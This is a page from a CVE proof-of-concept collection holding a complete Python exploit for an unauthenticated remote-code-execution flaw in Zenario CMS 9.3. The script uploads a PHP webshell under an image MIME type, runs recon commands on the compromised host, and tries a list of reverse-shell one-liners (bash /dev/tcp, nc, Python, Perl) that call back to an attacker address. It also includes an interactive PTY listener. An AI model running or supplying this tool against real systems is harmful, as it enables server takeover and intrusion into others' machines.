4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / zenario_exploit.py PY
#!/usr/bin/env python3
"""
Zenario CMS 9.3 - Unauthenticated RCE Exploit (CVE-2022-41840)

Upload endpoint (confirmed from PoC):
  POST /zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload
  Field : fileUpload  |  MIME: image/svg+xml
  JSON response: {"files":[{"name":"x.php","path":"private\/uploads\/RAND\/x.php"}]}

Shell: GET /private/uploads/RAND/x.php?cmd=id

Usage:
  python3 zenario_exploit.py --target http://10.0.160.54                          # interactive webshell
  python3 zenario_exploit.py --target http://10.0.160.54 --cmd "id"               # single command
  python3 zenario_exploit.py --target http://10.0.160.54 --lhost 10.x.x.x --lport 4444   # reverse shell
"""

import requests, argparse, sys, re, time, json, random, string, threading, os, select, tty, termios
from urllib.parse import urljoin

requests.packages.urllib3.disable_warnings()

R="\033[91m"; G="\033[92m"; Y="\033[93m"; B="\033[94m"; C="\033[96m"; W="\033[0m"; BOLD="\033[1m"

def banner():
    print(f"""{C}{BOLD}
╔══════════════════════════════════════════════════════════════╗
║      Zenario CMS 9.3 - Unauthenticated RCE (CVE-2022-41840) ║
║      Upload → JSON path → Webshell → Reverse PTY Shell      ║
╚══════════════════════════════════════════════════════════════╝{W}
""")

def log(msg, level="info"):
    tag = {"info":f"{B}[*]{W}","success":f"{G}[+]{W}",
           "warn":f"{Y}[!]{W}","error":f"{R}[-]{W}","cmd":f"{C}[>]{W}"}.get(level,"[*]")
    print(f"{tag} {msg}", flush=True)

# ── Webshell: tries multiple exec functions in order ─────────────────────────
# This ensures output even if system() or passthru() are disabled by PHP config
WEBSHELL = b"""<?php
$cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
if($cmd == '') { echo 'SHELL_OK'; exit; }
ob_start();
if(function_exists('system'))        { system($cmd);              }
elseif(function_exists('passthru'))  { passthru($cmd);            }
elseif(function_exists('exec'))      { echo exec($cmd);           }
elseif(function_exists('shell_exec')){ echo shell_exec($cmd);     }
elseif(function_exists('popen'))     {
    $h = popen($cmd, 'r');
    while(!feof($h)) { echo fread($h,4096); }
    pclose($h);
} else { echo 'NO_EXEC_FUNCTIONS'; }
$out = ob_get_clean();
echo $out;
?>"""

# ── Upload ────────────────────────────────────────────────────────────────────
def upload_shell(session, target, shell_name):
    # instanceId cycles from PoC default (20) then common values
    instance_ids = [20, 1, 2, 3, 4, 5, 10, 15, 25, 30, 40, 50]
    c_ids        = [1, 2, 3]

    for cid in c_ids:
        for iid in instance_ids:
            ep  = (f"/zenario/ajax.php?method_call=handlePluginAJAX"
                   f"&cID={cid}&slideId=0&cType=html&instanceId={iid}&fileUpload")
            url = urljoin(target, ep)
            log(f"Uploading → cID={cid} instanceId={iid}", "info")
            try:
                r = session.post(
                    url,
                    files={"fileUpload": (shell_name, WEBSHELL, "image/svg+xml")},
                    verify=False, timeout=15
                )
                log(f"HTTP {r.status_code} | {r.text[:200]}", "info")

                if r.status_code == 200 and r.text.strip():
                    # Primary: parse JSON
                    try:
                        data = json.loads(r.text)
                        flist = data.get("files", [])
                        if flist:
                            raw = flist[0].get("path", "")
                            path = raw.replace("\\/", "/")
                            log(f"Path from JSON: {path}", "success")
                            return path
                    except json.JSONDecodeError:
                        pass
                    # Fallback: regex
                    m = re.search(r'"path"\s*:\s*"([^"]+)"', r.text)
                    if m:
                        path = m.group(1).replace("\\/", "/")
                        log(f"Path from regex: {path}", "success")
                        return path

            except requests.exceptions.ConnectionError:
                log("Connection refused — is target up?", "error")
                sys.exit(1)
            except Exception as e:
                log(f"Error: {e}", "warn")

    return None

# ── Verify & get shell URL ────────────────────────────────────────────────────
def verify_shell(session, target, shell_path):
    if not shell_path.startswith("/"):
        shell_path = "/" + shell_path
    url = urljoin(target, shell_path)
    log(f"Verifying shell → {url}", "info")
    try:
        r = session.get(url, params={"cmd": "echo SHELL_TEST_OK"}, verify=False, timeout=10)
        log(f"Response body: [{r.text[:300]}]", "info")  # show raw so we can debug

        if "SHELL_TEST_OK" in r.text:
            log("RCE confirmed — output received!", "success")
            return url
        elif "SHELL_OK" in r.text:
            log("Shell reachable but exec functions may be restricted — trying anyway", "warn")
            return url
        elif "NO_EXEC_FUNCTIONS" in r.text:
            log("Shell uploaded but all exec functions are disabled on this server!", "error")
            return url  # still return, user may want to try other things
        elif r.status_code == 200:
            log(f"Shell reachable (200) but got unexpected body. Raw: {r.text[:200]}", "warn")
            return url
        else:
            log(f"HTTP {r.status_code} — shell may not be accessible", "warn")
    except Exception as e:
        log(f"Verify error: {e}", "warn")
    return None

# ── Execute a command via webshell ────────────────────────────────────────────
def exec_cmd(session, shell_url, cmd):
    try:
        r = session.get(shell_url, params={"cmd": cmd}, verify=False, timeout=20)
        return r.text.strip()
    except Exception as e:
        return f"[Error: {e}]"

# ── Reverse shell payloads ────────────────────────────────────────────────────
def get_reverse_payloads(lhost, lport):
    return [
        # Most reliable on Linux
        f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
        # mkfifo (works when bash tcp redirection is blocked)
        f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f",
        # Python3
        f"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
        # Python2 fallback
        f"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
        # Perl
        f"perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");'",
        # nc with -e
        f"nc -e /bin/bash {lhost} {lport}",
        # nc without -e (OpenBSD nc)
        f"nc {lhost} {lport} | /bin/bash | nc {lhost} {lport}",
    ]

def trigger_reverse_shell(session, shell_url, lhost, lport):
    payloads = get_reverse_payloads(lhost, lport)
    log(f"Trying {len(payloads)} reverse shell payloads → {lhost}:{lport}", "info")
    for i, payload in enumerate(payloads, 1):
        log(f"[{i}/{len(payloads)}] {payload[:80]}...", "cmd")
        try:
            session.get(shell_url, params={"cmd": payload}, verify=False, timeout=4)
        except Exception:
            pass  # timeout is expected when shell connects back
        time.sleep(2)

# ── PTY listener (fully interactive) ─────────────────────────────────────────
def pty_listener(lport):
    """
    Proper PTY-aware listener. Sets your terminal to raw mode so you get
    a fully interactive shell (arrow keys, tab completion, Ctrl+C all work).
    Automatically sends the PTY upgrade sequence on connect.
    """
    import socket as _socket

    s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
    s.setsockopt(_socket.SOL_SOCKET, _socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", lport))
    s.listen(1)

    log(f"Listening on 0.0.0.0:{lport} (PTY mode) ...", "success")
    log(f"Waiting for connection...", "info")

    conn, addr = s.accept()
    log(f"Got shell from {addr[0]}:{addr[1]}", "success")
    s.close()

    # Send PTY upgrade so we get a proper interactive shell
    pty_upgrade = (
        "python3 -c 'import pty;pty.spawn(\"/bin/bash\")' || "
        "python -c 'import pty;pty.spawn(\"/bin/bash\")' || "
        "script -q /dev/null /bin/bash\n"
    )
    conn.send(pty_upgrade.encode())
    time.sleep(0.5)

    # Send stty to fix terminal size
    rows, cols = os.popen("stty size", "r").read().split() if os.popen("stty size", "r").read() else ("24", "80")
    conn.send(f"stty rows {rows} cols {cols}\n".encode())
    time.sleep(0.3)
    conn.send(b"export TERM=xterm\n")
    time.sleep(0.3)

    log(f"{G}Shell upgraded! You have a PTY. Ctrl+C to kill.{W}", "success")

    # Save old terminal settings and switch to raw mode
    old_settings = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        conn.setblocking(False)

        while True:
            r, _, _ = select.select([conn, sys.stdin], [], [], 0.1)
            if conn in r:
                try:
                    data = conn.recv(4096)
                    if not data:
                        break
                    sys.stdout.buffer.write(data)
                    sys.stdout.buffer.flush()
                except Exception:
                    break
            if sys.stdin in r:
                ch = sys.stdin.buffer.read(1)
                if not ch:
                    break
                conn.send(ch)
    except Exception:
        pass
    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
        conn.close()
        print(f"\n{Y}[!] Connection closed.{W}")

# ── Interactive webshell (fallback if reverse shell isn't needed) ─────────────
def interactive_webshell(session, shell_url):
    log(f"{G}Webshell active. Type 'exit' to quit.{W}", "success")
    print(f"{Y}  URL   → {shell_url}{W}")
    print(f"{Y}  Tip   → type 'revshell <lhost> <lport>' to get a reverse PTY shell{W}\n")

    while True:
        try:
            cmd = input(f"{C}webshell$ {W}").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not cmd:
            continue
        if cmd.lower() in ("exit", "quit"):
            break
        if cmd.startswith("revshell "):
            parts = cmd.split()
            if len(parts) == 3:
                lhost, lport = parts[1], int(parts[2])
                log(f"Starting PTY listener on :{lport} then triggering shell...", "info")
                t = threading.Thread(target=pty_listener, args=(lport,), daemon=True)
                t.start()
                time.sleep(0.5)
                trigger_reverse_shell(session, shell_url, lhost, lport)
                t.join()
            else:
                log("Usage: revshell <lhost> <lport>", "warn")
            continue

        out = exec_cmd(session, shell_url, cmd)
        if out:
            print(out)
        else:
            print(f"{Y}(no output){W}")

# ── Main ──────────────────────────────────────────────────────────────────────
def main():
    banner()
    p = argparse.ArgumentParser(description="Zenario 9.3 Unauth RCE")
    p.add_argument("--target",  required=True, help="Target e.g. http://10.0.160.54")
    p.add_argument("--lhost",   help="Your IP for reverse shell")
    p.add_argument("--lport",   type=int, default=4444, help="Listener port (default: 4444)")
    p.add_argument("--cmd",     help="Single command to run and exit")
    p.add_argument("--shell",   help="Skip upload; use existing shell URL")
    args = p.parse_args()

    target   = args.target.rstrip("/")
    session  = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0"
    shell_url = args.shell

    # ── Phase 1: Upload ───────────────────────────────────────────────────────
    if not shell_url:
        name = ''.join(random.choices(string.ascii_lowercase, k=7)) + ".php"
        log(f"Target     : {target}", "info")
        log(f"Shell name : {name}", "info")
        print()

        path = upload_shell(session, target, name)
        if not path:
            log("Upload failed on all endpoints.", "error")
            log("Hint: check the target's page source for instanceId=N in plugin URLs", "warn")
            sys.exit(1)
        print()

        # ── Phase 2: Verify ───────────────────────────────────────────────────
        shell_url = verify_shell(session, target, path)
        if not shell_url:
            log("Shell not reachable — check path manually", "error")
            sys.exit(1)
        print()

    # ── Phase 3: Recon ────────────────────────────────────────────────────────
    log("Recon:", "info")
    for label, cmd in [
        ("id      ", "id"),
        ("whoami  ", "whoami"),
        ("hostname", "hostname"),
        ("uname   ", "uname -a"),
        ("cwd     ", "pwd"),
    ]:
        out = exec_cmd(session, shell_url, cmd)
        log(f"  {label} → {G}{out if out else '(no output)'}{W}", "success")
    print()

    # ── Phase 4: Shell ────────────────────────────────────────────────────────
    if args.cmd:
        out = exec_cmd(session, shell_url, args.cmd)
        print(f"\n{G}{out}{W}\n")

    elif args.lhost:
        log("Starting PTY listener then triggering reverse shell...", "info")
        t = threading.Thread(target=pty_listener, args=(args.lport,), daemon=True)
        t.start()
        time.sleep(0.5)
        trigger_reverse_shell(session, shell_url, args.lhost, args.lport)
        t.join()

    else:
        interactive_webshell(session, shell_url)


if __name__ == "__main__":
    main()